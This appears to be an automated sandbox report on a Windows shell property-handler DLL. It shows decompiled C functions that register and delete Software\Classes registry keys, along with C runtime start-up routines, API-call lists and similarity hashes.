                                                      • GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
                                                      • __calloc_crt.LIBCMT ref: 10007819
                                                      • GetFileType.KERNEL32 ref: 10007860
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 10007952
                                                      • GetFileType.KERNEL32 ref: 10007964
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 301580142-0
                                                      • Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                                      • Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
                                                      • Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                                      • Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 55%
                                                      			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
                                                      				signed int _v8;
                                                      				short _v10;
                                                      				long _v1032;
                                                      				intOrPtr _v1036;
                                                      				intOrPtr _v1040;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t20;
                                                      				int _t26;
                                                      				wchar_t* _t32;
                                                      				intOrPtr _t33;
                                                      				intOrPtr _t37;
                                                      				void* _t40;
                                                      				WCHAR* _t41;
                                                      				short _t42;
                                                      				signed int _t44;
                                                      				void* _t48;
                                                      				short _t52;
                                                      
                                                      				_t20 =  *0x10012158; // 0x5da49213
                                                      				_v8 = _t20 ^ _t44;
                                                      				_t37 = _a8;
                                                      				_v1036 = _a4;
                                                      				_t41 = _a12;
                                                      				_v1040 = _a16;
                                                      				_t42 = 0;
                                                      				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
                                                      				if(_t26 < 0) {
                                                      					L4:
                                                      					_t42 = 0x8007007a;
                                                      					goto L5;
                                                      				} else {
                                                      					_t48 = _t26 - 0x1ff;
                                                      					if(_t48 > 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						if(_t48 == 0) {
                                                      							L5:
                                                      							_v10 = 0;
                                                      						}
                                                      					}
                                                      				}
                                                      				if(_t42 >= 0) {
                                                      					_t32 =  &_v1032;
                                                      					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
                                                      					_t42 = _t32;
                                                      					if(_t42 > 0) {
                                                      						_t52 = _t42;
                                                      					}
                                                      					if(_t52 >= 0) {
                                                      						_t33 = _v1036;
                                                      						if( *((char*)(_t33 + 0x26a)) == 0) {
                                                      							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
                                                      							if(_t33 == 0) {
                                                      								L14:
                                                      								 *((char*)(_v1036 + 0x26a)) = 1;
                                                      							} else {
                                                      								_t37 = StrStrIW;
                                                      								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
                                                      									goto L14;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
                                                      			}



                                                      APIs
                                                      • vswprintf.LIBCMT ref: 10003441
                                                        • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                                      • lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
                                                      • RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
                                                      • StrCmpNICW.SHLWAPI(5DA49213,Software\Classes\%s,00000013), ref: 100034BA
                                                      • StrStrIW.SHLWAPI(5DA49213,PropertyHandlers), ref: 100034D0
                                                      • StrStrIW.SHLWAPI(5DA49213,KindMap), ref: 100034DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Value__vsnwprintf_llstrlenvswprintf
                                                      • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                                      • API String ID: 1581644826-984809517
                                                      • Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                                      • Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
                                                      • Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                                      • Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 49%
                                                      			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
                                                      				signed int _v8;
                                                      				short _v10;
                                                      				long _v1032;
                                                      				intOrPtr _v1036;
                                                      				intOrPtr _v1040;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t19;
                                                      				int _t25;
                                                      				wchar_t* _t30;
                                                      				intOrPtr _t31;
                                                      				intOrPtr _t35;
                                                      				void* _t38;
                                                      				WCHAR* _t39;
                                                      				short _t40;
                                                      				signed int _t42;
                                                      				void* _t46;
                                                      				short _t50;
                                                      
                                                      				_t19 =  *0x10012158; // 0x5da49213
                                                      				_v8 = _t19 ^ _t42;
                                                      				_t35 = _a8;
                                                      				_v1036 = _a4;
                                                      				_t39 = _a12;
                                                      				_v1040 = _a16;
                                                      				_t40 = 0;
                                                      				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
                                                      				if(_t25 < 0) {
                                                      					L4:
                                                      					_t40 = 0x8007007a;
                                                      					goto L5;
                                                      				} else {
                                                      					_t46 = _t25 - 0x1ff;
                                                      					if(_t46 > 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						if(_t46 == 0) {
                                                      							L5:
                                                      							_v10 = 0;
                                                      						}
                                                      					}
                                                      				}
                                                      				if(_t40 >= 0) {
                                                      					_t30 =  &_v1032;
                                                      					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
                                                      					_t40 = _t30;
                                                      					if(_t40 > 0) {
                                                      						_t50 = _t40;
                                                      					}
                                                      					if(_t50 >= 0) {
                                                      						_t31 = _v1036;
                                                      						if( *((char*)(_t31 + 0x26a)) == 0) {
                                                      							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
                                                      							if(_t31 == 0) {
                                                      								L14:
                                                      								 *((char*)(_v1036 + 0x26a)) = 1;
                                                      							} else {
                                                      								_t35 = StrStrIW;
                                                      								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
                                                      									goto L14;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
                                                      			}

                                                      APIs
                                                      • vswprintf.LIBCMT ref: 10003551
                                                        • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                                      • RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
                                                      • StrCmpNICW.SHLWAPI(5DA49213,Software\Classes\%s,00000013), ref: 100035BD
                                                      • StrStrIW.SHLWAPI(5DA49213,PropertyHandlers), ref: 100035D3
                                                      • StrStrIW.SHLWAPI(5DA49213,KindMap), ref: 100035DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Value__vsnwprintf_lvswprintf
                                                      • String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
                                                      • API String ID: 396321892-1357300599
                                                      • Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                                      • Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
                                                      • Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                                      • Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 49%
                                                      			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
                                                      				signed int _v8;
                                                      				short _v10;
                                                      				long _v1032;
                                                      				intOrPtr _v1036;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t16;
                                                      				int _t21;
                                                      				void* _t24;
                                                      				intOrPtr _t26;
                                                      				signed short _t30;
                                                      				void* _t31;
                                                      				void* _t34;
                                                      				intOrPtr _t35;
                                                      				WCHAR* _t36;
                                                      				signed short _t37;
                                                      				signed int _t40;
                                                      				void* _t44;
                                                      
                                                      				_t16 =  *0x10012158; // 0x5da49213
                                                      				_v8 = _t16 ^ _t40;
                                                      				_t35 = _a8;
                                                      				_v1036 = _a4;
                                                      				_t37 = 0;
                                                      				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
                                                      				if(_t21 < 0) {
                                                      					L4:
                                                      					_t37 = 0x8007007a;
                                                      					L5:
                                                      					_v10 = 0;
                                                      					L6:
                                                      					if(_t37 >= 0) {
                                                      						_t30 =  &_v1032;
                                                      						__imp__RegDeleteTreeW(_t35, _t30);
                                                      						_t37 = _t30;
                                                      						if(_t37 > 0) {
                                                      							_t37 = _t37 & 0x0000ffff | 0x80070000;
                                                      						}
                                                      					}
                                                      					_t36 = _a12;
                                                      					if(_t37 >= 0) {
                                                      						_t26 = _v1036;
                                                      						if( *((char*)(_t26 + 0x26a)) == 0) {
                                                      							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
                                                      							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
                                                      								 *((char*)(_v1036 + 0x26a)) = 1;
                                                      							}
                                                      						}
                                                      					}
                                                      					_t38 =  ==  ? 0 : _t37;
                                                      					_t24 =  ==  ? 0 : _t37;
                                                      					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
                                                      				}
                                                      				_t44 = _t21 - 0x1ff;
                                                      				if(_t44 > 0) {
                                                      					goto L4;
                                                      				}
                                                      				if(_t44 != 0) {
                                                      					goto L6;
                                                      				} else {
                                                      					goto L5;
                                                      				}
                                                      			}

                                                      APIs
                                                      • vswprintf.LIBCMT ref: 10003346
                                                        • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                                      • RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
                                                      • StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
                                                      • StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
                                                      • StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: DeleteTree__vsnwprintf_lvswprintf
                                                      • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                                      • API String ID: 1945471109-984809517
                                                      • Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                                      • Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
                                                      • Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                                      • Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E1000CB53(void* __eflags, signed int _a4) {
                                                      				void* _t12;
                                                      				signed int _t13;
                                                      				signed int _t16;
                                                      				intOrPtr _t18;
                                                      				void* _t22;
                                                      				signed int _t35;
                                                      				long _t40;
                                                      
                                                      				_t13 = E100076DE(_t12);
                                                      				if(_t13 >= 0) {
                                                      					_t35 = _a4;
                                                      					if(E1000C21F(_t35) == 0xffffffff) {
                                                      						L10:
                                                      						_t40 = 0;
                                                      					} else {
                                                      						_t18 =  *0x10014c80;
                                                      						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                      							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                      								goto L8;
                                                      							} else {
                                                      								goto L7;
                                                      							}
                                                      						} else {
                                                      							L7:
                                                      							_t22 = E1000C21F(2);
                                                      							if(E1000C21F(1) == _t22) {
                                                      								goto L10;
                                                      							} else {
                                                      								L8:
                                                      								if(CloseHandle(E1000C21F(_t35)) != 0) {
                                                      									goto L10;
                                                      								} else {
                                                      									_t40 = GetLastError();
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					E1000C199(_t35);
                                                      					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                      					if(_t40 == 0) {
                                                      						_t16 = 0;
                                                      					} else {
                                                      						_t16 = E10005EA5(_t40) | 0xffffffff;
                                                      					}
                                                      					return _t16;
                                                      				} else {
                                                      					return _t13 | 0xffffffff;
                                                      				}
                                                      			}

                                                      APIs
                                                      • __ioinit.LIBCMT ref: 1000CB56
                                                        • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                                      • __get_osfhandle.LIBCMT ref: 1000CB6A
                                                      • __get_osfhandle.LIBCMT ref: 1000CB95
                                                      • __get_osfhandle.LIBCMT ref: 1000CB9E
                                                      • __get_osfhandle.LIBCMT ref: 1000CBAA
                                                      • CloseHandle.KERNEL32(00000000), ref: 1000CBB1
                                                      • GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
                                                      • __free_osfhnd.LIBCMT ref: 1000CBC8
                                                      • __dosmaperr.LIBCMT ref: 1000CBEA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                      • String ID:
                                                      • API String ID: 974577687-0
                                                      • Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                                      • Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
                                                      • Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                                      • Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
                                                      • VariantClear.OLEAUT32(?), ref: 10002B69
                                                        • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                                        • Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
                                                        • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                                        • Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                                        • Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                                      • PropVariantClear.OLE32(?), ref: 10002B59
                                                      • VariantClear.OLEAUT32(?), ref: 10002B63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
                                                      • String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
                                                      • API String ID: 3673094071-3396277477
                                                      • Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                                      • Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
                                                      • Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                                      • Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E100061BA(void* __ebx, void* __edi) {
                                                      				void* __esi;
                                                      				void* _t3;
                                                      				intOrPtr _t6;
                                                      				long _t14;
                                                      				long* _t27;
                                                      
                                                      				E1000750E(_t3);
                                                      				if(E100092DA() != 0) {
                                                      					_t6 = E10007E6B(_t5, E10005F1A);
                                                      					 *0x10012310 = _t6;
                                                      					__eflags = _t6 - 0xffffffff;
                                                      					if(_t6 == 0xffffffff) {
                                                      						goto L1;
                                                      					} else {
                                                      						_t27 = E10007F1D(1, 0x3b8);
                                                      						__eflags = _t27;
                                                      						if(_t27 == 0) {
                                                      							L6:
                                                      							E10006230();
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						} else {
                                                      							__eflags = E10007E95(_t9,  *0x10012310, _t27);
                                                      							if(__eflags == 0) {
                                                      								goto L6;
                                                      							} else {
                                                      								_push(0);
                                                      								_push(_t27);
                                                      								E1000610E(__ebx, __edi, _t27, __eflags);
                                                      								_t14 = GetCurrentThreadId();
                                                      								_t27[1] = _t27[1] | 0xffffffff;
                                                      								 *_t27 = _t14;
                                                      								__eflags = 1;
                                                      								return 1;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					E10006230();
                                                      					return 0;
                                                      				}
                                                      			}

                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 100061BA
                                                        • Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
                                                        • Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532
                                                      • __mtinitlocks.LIBCMT ref: 100061BF
                                                        • Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8
                                                      • __mtterm.LIBCMT ref: 100061C8
                                                        • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
                                                        • Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
                                                        • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F
                                                      • __calloc_crt.LIBCMT ref: 100061ED
                                                      • __initptd.LIBCMT ref: 1000620F
                                                      • GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 757573777-0
                                                      • Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                                      • Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
                                                      • Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                                      • Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
                                                      				signed int _v8;
                                                      				char _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t45;
                                                      				signed int _t46;
                                                      				signed int _t47;
                                                      				signed int _t50;
                                                      				signed int _t53;
                                                      				signed int _t54;
                                                      				signed int _t59;
                                                      				void* _t64;
                                                      				signed int _t66;
                                                      				void* _t68;
                                                      				signed int _t75;
                                                      				signed int _t79;
                                                      				signed short _t80;
                                                      				signed int _t82;
                                                      				void* _t83;
                                                      				signed int _t90;
                                                      				void* _t91;
                                                      				signed int _t92;
                                                      				signed int _t94;
                                                      				signed int* _t97;
                                                      
                                                      				_t46 = E100076DE(_t45);
                                                      				if(_t46 >= 0) {
                                                      					_t97 = _a8;
                                                      					_t47 = E100095F8(_t97);
                                                      					_t79 = _t97[3];
                                                      					_t94 = _t47;
                                                      					__eflags = _t79 & 0x00000082;
                                                      					if((_t79 & 0x00000082) != 0) {
                                                      						__eflags = _t79 & 0x00000040;
                                                      						if((_t79 & 0x00000040) == 0) {
                                                      							_t75 = 0;
                                                      							__eflags = _t79 & 0x00000001;
                                                      							if((_t79 & 0x00000001) == 0) {
                                                      								L10:
                                                      								_t50 = _t97[3] & 0xffffffef | 0x00000002;
                                                      								_t97[3] = _t50;
                                                      								_t97[1] = _t75;
                                                      								__eflags = _t50 & 0x0000010c;
                                                      								if((_t50 & 0x0000010c) == 0) {
                                                      									_t64 = E1000951C();
                                                      									__eflags = _t97 - _t64 + 0x20;
                                                      									if(_t97 == _t64 + 0x20) {
                                                      										L13:
                                                      										_t66 = E1000961C(_t94);
                                                      										__eflags = _t66;
                                                      										if(_t66 == 0) {
                                                      											goto L14;
                                                      										}
                                                      									} else {
                                                      										_t68 = E1000951C();
                                                      										__eflags = _t97 - _t68 + 0x40;
                                                      										if(_t97 != _t68 + 0x40) {
                                                      											L14:
                                                      											E1000A133(_t97);
                                                      										} else {
                                                      											goto L13;
                                                      										}
                                                      									}
                                                      								}
                                                      								__eflags = _t97[3] & 0x00000108;
                                                      								if(__eflags == 0) {
                                                      									_v12 = _a4;
                                                      									_push(2);
                                                      									_push( &_v12);
                                                      									_push(_t94);
                                                      									_v8 = 2;
                                                      									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
                                                      									_t80 = _a4;
                                                      									_t75 = _t53;
                                                      									goto L27;
                                                      								} else {
                                                      									_t92 = _t97[2];
                                                      									 *_t97 = _t92 + 2;
                                                      									_t82 =  *_t97 - _t92;
                                                      									_v8 = _t82;
                                                      									_t97[1] = _t97[6] - 2;
                                                      									__eflags = _t82;
                                                      									if(__eflags <= 0) {
                                                      										__eflags = _t94 - 0xffffffff;
                                                      										if(_t94 == 0xffffffff) {
                                                      											L22:
                                                      											_t83 = 0x10012340;
                                                      										} else {
                                                      											__eflags = _t94 - 0xfffffffe;
                                                      											if(_t94 == 0xfffffffe) {
                                                      												goto L22;
                                                      											} else {
                                                      												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
                                                      											}
                                                      										}
                                                      										__eflags =  *(_t83 + 4) & 0x00000020;
                                                      										if(__eflags == 0) {
                                                      											goto L25;
                                                      										} else {
                                                      											_push(2);
                                                      											_push(_t75);
                                                      											_push(_t75);
                                                      											_push(_t94);
                                                      											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
                                                      											__eflags = (_t59 & _t92) - 0xffffffff;
                                                      											if((_t59 & _t92) == 0xffffffff) {
                                                      												goto L28;
                                                      											} else {
                                                      												goto L25;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										_push(_t82);
                                                      										_push(_t92);
                                                      										_push(_t94);
                                                      										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
                                                      										L25:
                                                      										_t80 = _a4;
                                                      										 *(_t97[2]) = _t80;
                                                      										L27:
                                                      										__eflags = _t75 - _v8;
                                                      										if(_t75 == _v8) {
                                                      											_t54 = _t80 & 0x0000ffff;
                                                      										} else {
                                                      											L28:
                                                      											_t43 =  &(_t97[3]);
                                                      											 *_t43 = _t97[3] | 0x00000020;
                                                      											__eflags =  *_t43;
                                                      											goto L29;
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_t97[1] = 0;
                                                      								__eflags = _t79 & 0x00000010;
                                                      								if((_t79 & 0x00000010) == 0) {
                                                      									_t97[3] = _t79 | 0x00000020;
                                                      									L29:
                                                      									_t54 = 0xffff;
                                                      								} else {
                                                      									_t90 = _t79 & 0xfffffffe;
                                                      									__eflags = _t90;
                                                      									 *_t97 = _t97[2];
                                                      									_t97[3] = _t90;
                                                      									goto L10;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							 *((intOrPtr*)(E10005EC6())) = 0x22;
                                                      							goto L6;
                                                      						}
                                                      					} else {
                                                      						 *((intOrPtr*)(E10005EC6())) = 9;
                                                      						L6:
                                                      						_t97[3] = _t97[3] | 0x00000020;
                                                      						_t54 = 0xffff;
                                                      					}
                                                      					return _t54;
                                                      				} else {
                                                      					return _t46 | 0xffffffff;
                                                      				}
                                                      			}

                                                      APIs
                                                      • __ioinit.LIBCMT ref: 1000C46D
                                                        • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Once$ExecuteInit__ioinit
                                                      • String ID:
                                                      • API String ID: 129814473-0
